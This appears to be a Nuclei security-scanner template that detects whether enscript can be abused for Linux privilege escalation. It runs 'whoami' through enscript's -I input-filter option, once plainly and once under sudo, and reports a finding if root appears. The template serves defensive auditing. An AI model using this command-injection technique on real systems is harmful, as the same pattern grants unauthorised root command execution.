48 lines
1.3 KiB
YAML
48 lines
1.3 KiB
YAML
id: privesc-enscript
|
|
|
|
info:
|
|
name: enscript - Privilege Escalation
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
enscript is a command-line tool used for converting text files to PostScript format for printing. It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.
|
|
reference:
|
|
- https://gtfobins.github.io/gtfobins/enscript/
|
|
metadata:
|
|
verified: true
|
|
tags: code,linux,enscript,privesc
|
|
|
|
self-contained: true
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
whoami
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
enscript /dev/null -qo /dev/null -I 'whoami >&2'
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: code_1_response
|
|
words:
|
|
- "root"
|
|
negative: true
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(code_2_response, "root")'
|
|
- 'contains(code_3_response, "root")'
|
|
condition: or
|
|
# digest: 4a0a00473045022100cd92c4051987599289f054963d4a8bef07e76dde6a71fc5369dfb8d7bd7d6de502203d17432adfb10310d44a7665cd1039f3ed412c9724b10499074976a8abe39a41:922c64590222798bb761d5b6d8e72950 |